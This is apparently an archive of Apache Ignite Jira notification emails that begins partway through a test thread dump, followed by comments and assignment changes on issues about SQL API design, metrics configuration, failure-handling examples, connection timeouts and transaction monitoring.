> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1563)
>   at 
> 

[jira] [Commented] (IGNITE-15212) [Ignite 3] SQL API design.

2022-04-13 Thread Andrey N. Gura (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-15212?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521510#comment-17521510
 ] 

Andrey N. Gura commented on IGNITE-15212:
-

[~amashenkov] LGTM. Thanks for your contribution!

> [Ignite 3] SQL API design.
> --
>
> Key: IGNITE-15212
> URL: https://issues.apache.org/jira/browse/IGNITE-15212
> Project: Ignite
>  Issue Type: New Feature
>  Components: sql
>Reporter: Andrey Mashenkov
>Assignee: Andrey Mashenkov
>Priority: Major
>  Labels: ignite-3
>  Time Spent: 7h 40m
>  Remaining Estimate: 0h
>
> We need an SQL API for executing queries, query management, and maybe other 
> stuff like statistics management.
> Let's consider 
> # sync, async and reactive ways for query execution and compare other 
> vendor's API.
> # potential integrations with frameworks like 
> ** Reactor - rich API for working with reactive streams [1],
> **  R2DBC - reactive analog of JDBC [2]
> **  JOOQ - query builder. [3]
> and then propose a draft of how SQL API could look like for further IEP.
> [1] https://projectreactor.io/
> [2] https://r2dbc.io/
> [3] https://www.jooq.org/



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-16840) Error creating bean SqlViewMetricExporterSpi while setting bean property 'metricExporterSpi' according documentation

2022-04-13 Thread YuJue Li (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16840?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521498#comment-17521498
 ] 

YuJue Li commented on IGNITE-16840:
---

This issue is caused by outdated documents. I think the documents should be 
updated.

> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according documentation
> 
>
> Key: IGNITE-16840
> URL: https://issues.apache.org/jira/browse/IGNITE-16840
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.12
>Reporter: Igor Zadubinin
>Assignee: Igor Zadubinin
>Priority: Major
>
> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according documentation 
> [https://ignite.apache.org/docs/latest/monitoring-metrics/new-metrics-system]
>  
> Error creating bean with name 'ignite.cfg' defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml]:
>  Cannot create inner bean 
> 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' of type 
> [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] while setting 
> bean property 'metricExporterSpi' with key [0]; nested exception is 
> org.springframework.beans.factory.CannotLoadBeanClassException: Cannot find 
> class [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] for bean 
> with name 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' 
> defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml];
>  nested exception is java.lang.ClassNotFoundException: 
> org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-12652) Add example of failure handling

2022-04-13 Thread Luchnikov Alexander (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-12652?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521485#comment-17521485
 ] 

Luchnikov Alexander commented on IGNITE-12652:
--

[~akalashnikov]
Hi, is this enough as an example 
[PR|https://github.com/apache/ignite/pull/9961]?
In what form, in an example, can you show the work of the Diagnostic Processor?

> Add example of failure handling
> ---
>
> Key: IGNITE-12652
> URL: https://issues.apache.org/jira/browse/IGNITE-12652
> Project: Ignite
>  Issue Type: Task
>  Components: examples
>Reporter: Anton Kalashnikov
>Assignee: Luchnikov Alexander
>Priority: Major
>  Labels: newbie
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> Ignite has the following feature - 
> https://apacheignite.readme.io/docs/critical-failures-handling, but there is 
> not an example of how to use it correctly. So it is good to add some examples.
> Also, Ignite has DiagnosticProcessor which invokes when the failure handler 
> is triggered. Maybe it is a good idea to add to this example some samples of 
> diagnostic work.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11302) idleConnectionTimeout TcpComm different on server and client (client default > server custom) lead to wait until client timeout on server side

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11302?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-11302:


Assignee: (was: Dmitriy Sorokin)

> idleConnectionTimeout TcpComm different on server and client (client default 
> > server custom) lead to wait until client timeout on server side
> --
>
> Key: IGNITE-11302
> URL: https://issues.apache.org/jira/browse/IGNITE-11302
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.5
>Reporter: ARomantsov
>Priority: Critical
>
> Server config:
> {code:xml}
> 
>  class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> 
> 
> 
> Client config
> 
>  class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> 
> 
> {code}
> Server wait until default idleConnectionTimeout (10 m) for client fail.
> If both config with idleConnectionTimeout=1 s - ignite worked according to 
> config



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11302) idleConnectionTimeout TcpComm different on server and client (client default > server custom) lead to wait until client timeout on server side

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11302?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-11302:


Assignee: (was: Dmitriy Sorokin)

> idleConnectionTimeout TcpComm different on server and client (client default 
> > server custom) lead to wait until client timeout on server side
> --
>
> Key: IGNITE-11302
> URL: https://issues.apache.org/jira/browse/IGNITE-11302
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.5
>Reporter: ARomantsov
>Priority: Critical
>
> Server config:
> {code:xml}
> 
>  class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> 
> 
> 
> Client config
> 
>  class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> 
> 
> {code}
> Server wait until default idleConnectionTimeout (10 m) for client fail.
> If both config with idleConnectionTimeout=1 s - ignite worked according to 
> config



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11302) idleConnectionTimeout TcpComm different on server and client (client default > server custom) lead to wait until client timeout on server side

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11302?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-11302:


Assignee: Dmitriy Sorokin

> idleConnectionTimeout TcpComm different on server and client (client default 
> > server custom) lead to wait until client timeout on server side
> --
>
> Key: IGNITE-11302
> URL: https://issues.apache.org/jira/browse/IGNITE-11302
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.5
>Reporter: ARomantsov
>Assignee: Dmitriy Sorokin
>Priority: Critical
>
> Server config:
> {code:xml}
> 
>  class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> 
> 
> 
> Client config
> 
>  class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> 
> 
> {code}
> Server wait until default idleConnectionTimeout (10 m) for client fail.
> If both config with idleConnectionTimeout=1 s - ignite worked according to 
> config



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-6300) BinaryObject's set size estimator

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-6300?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-6300:
---

Assignee: (was: Dmitriy Sorokin)

> BinaryObject's set size estimator
> -
>
> Key: IGNITE-6300
> URL: https://issues.apache.org/jira/browse/IGNITE-6300
> Project: Ignite
>  Issue Type: New Feature
>Reporter: Anton Vinogradov (Obsolete, actual is "av")
>Priority: Major
>
> Need to provide some API to estimate requirements for any data model.
> For example:
> 1) You have classes A,B and C with known fields and data distribution over 
> this fields.
> 2) You know that you have to keep 1M of A, 2M of B and 45K of C.
> 3) BinarySizeEstimator should return you expected memory consumption on 
> actual Ignite version without starting a node.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-6894) Hanged Tx monitoring

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-6894?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-6894:
---

Assignee: (was: Dmitriy Sorokin)

> Hanged Tx monitoring
> 
>
> Key: IGNITE-6894
> URL: https://issues.apache.org/jira/browse/IGNITE-6894
> Project: Ignite
>  Issue Type: Improvement
>Reporter: Anton Vinogradov (Obsolete, actual is "av")
>Priority: Major
>  Labels: iep-7
>
> Hanging Transactions not Related to Deadlock
> Description
>  This situation can occur if user explicitly markups the transaction (esp 
> Pessimistic Repeatable Read) and, for example, calls remote service (which 
> may be unresponsive) after acquiring some locks. All other transactions 
> depending on the same keys will hang.
> Detection and Solution
>  This most likely cannot be resolved automatically other than rollback TX by 
> timeout and release all the locks acquired so far. Also such TXs can be 
> rolled back from Web Console as described above.
>  If transaction has been rolled back on timeout or via UI then any further 
> action in the transaction, e.g. lock acquisition or commit attempt should 
> throw exception.
> Report
> Management tools (eg. Web Console) should provide ability to rollback any 
> transaction via UI.
>  Long running transaction should be reported to logs. Log record should 
> contain: near nodes, transaction IDs, cache names, keys (limited to several 
> tens of), etc ( ?).
> Also there should be a screen in Web Console that will list all ongoing 
> transactions in the cluster including the info as above.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-6895) TX deadlock monitoring

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-6895?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-6895:
---

Assignee: (was: Dmitriy Sorokin)

> TX deadlock monitoring
> --
>
> Key: IGNITE-6895
> URL: https://issues.apache.org/jira/browse/IGNITE-6895
> Project: Ignite
>  Issue Type: Improvement
>Reporter: Anton Vinogradov (Obsolete, actual is "av")
>Priority: Major
>  Labels: iep-7
>
> Deadlocks with Cache Transactions
> Description
> Deadlocks of this type are possible if user locks 2 or more keys within 2 or 
> more transactions in different orders (this does not apply to OPTIMISTIC 
> SERIALIZABLE transactions as they are capable to detect deadlock and choose 
> winning tx). Currently, Ignite can detect deadlocked transactions but this 
> procedure is started only for transactions that have timeout set explicitly 
> or default timeout in configuration set to value greater than 0.
> Detection and Solution
> Each NEAR node should periodically (need new config property?) scan the list 
> of local transactions and initiate the same procedure as we have now for 
> timed out transactions. If deadlock found it should be reported to logs. Log 
> record should contain: near nodes, transaction IDs, cache names, keys 
> (limited to several tens of) involved in deadlock. User should have ability 
> to configure default behavior - REPORT_ONLY, ROLLBACK (any more?) or manually 
> rollback selected transaction through web console or Visor.
> Report
> If deadlock found it should be reported to logs. Log record should contain: 
> near nodes, transaction IDs, cache names, keys (limited to several tens of) 
> involved in deadlock.
> Also there should be a screen in Web Console that will list all ongoing 
> transactions in the cluster including the following info:
> - Near node
> - Start time
> - DHT nodes
> - Pending Locks (by request)
> Web Console should provide ability to rollback any transaction via UI.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)